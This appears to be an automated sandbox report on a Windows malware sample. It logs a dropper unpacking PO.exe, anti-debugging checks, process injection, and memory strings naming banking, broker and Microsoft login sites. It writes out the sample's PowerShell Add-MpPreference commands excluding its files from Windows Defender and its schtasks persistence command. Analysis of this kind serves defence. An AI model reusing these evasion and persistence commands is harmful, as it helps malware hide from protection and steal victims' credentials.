Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Code function: 0_2_00188590 __EH_prolog3_GS,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,	0_2_00188590
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Code function: 0_2_001986E8 FindFirstFileExA,	0_2_001986E8

Source: C:\Users\user\Desktop\w4XFffGDz1.exe

Code function: 0_2_0018BC1D VirtualQuery,GetSystemInfo,

0_2_0018BC1D

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	File opened: C:\Users\user\AppData\Local\Temp\acrocef_low\NULL	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\NULL	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\NULL	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe	Jump to behavior

Source: tmp37DC.tmp.14.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: tmp37DC.tmp.14.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: tmp37DC.tmp.14.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: tmp37DC.tmp.14.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: tmp37DC.tmp.14.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: tmp37DC.tmp.14.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: tmp37DC.tmp.14.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: tmp37DC.tmp.14.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: tmp37DC.tmp.14.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: tmp37DC.tmp.14.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: tmp37DC.tmp.14.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: tmp37DC.tmp.14.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: tmp37DC.tmp.14.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: tmp37DC.tmp.14.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: tmp37DC.tmp.14.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: PO.exe, 0000000E.00000002.2275317622.00000000013F5000.00000004.00000020.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2356294737.000000000118F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: tmp37DC.tmp.14.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: tmp37DC.tmp.14.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: tmp37DC.tmp.14.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: tmp37DC.tmp.14.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: tmp37DC.tmp.14.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: tmp37DC.tmp.14.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: AJzHYZtQIb.exe, 00000010.00000002.2243982983.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: tmp37DC.tmp.14.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: tmp37DC.tmp.14.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: tmp37DC.tmp.14.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: PO.exe, 00000007.00000002.2162816611.0000000007044000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}D
Source: tmp37DC.tmp.14.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: tmp37DC.tmp.14.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: tmp37DC.tmp.14.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: tmp37DC.tmp.14.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: tmp37DC.tmp.14.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: tmp37DC.tmp.14.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: tmp37DC.tmp.14.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\w4XFffGDz1.exe

API call chain: ExitProcess graph end node

graph_0-25877

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\w4XFffGDz1.exe

Code function: 0_2_0018D242 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0018D242

Source: C:\Users\user\Desktop\w4XFffGDz1.exe

Code function: 0_2_001953C2 mov eax, dword ptr fs:[00000030h]

0_2_001953C2

Source: C:\Users\user\Desktop\w4XFffGDz1.exe

Code function: 0_2_001993D0 GetProcessHeap,

0_2_001993D0

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Code function: 0_2_0018D242 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0018D242
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Code function: 0_2_001912B4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_001912B4
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Code function: 0_2_0018D3E5 SetUnhandledExceptionFilter,	0_2_0018D3E5
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Code function: 0_2_0018C69D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0018C69D

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe"
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe"	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Memory written: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Memory written: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe base: 400000 value starts with: 4D5A

Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp61B0.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp8574.tmp"
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Process created: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe "C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe"

Source: C:\Users\user\Desktop\w4XFffGDz1.exe

Code function: 0_2_0018D05E cpuid

0_2_0018D05E

Source: C:\Users\user\Desktop\w4XFffGDz1.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

0_2_00186CF5

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
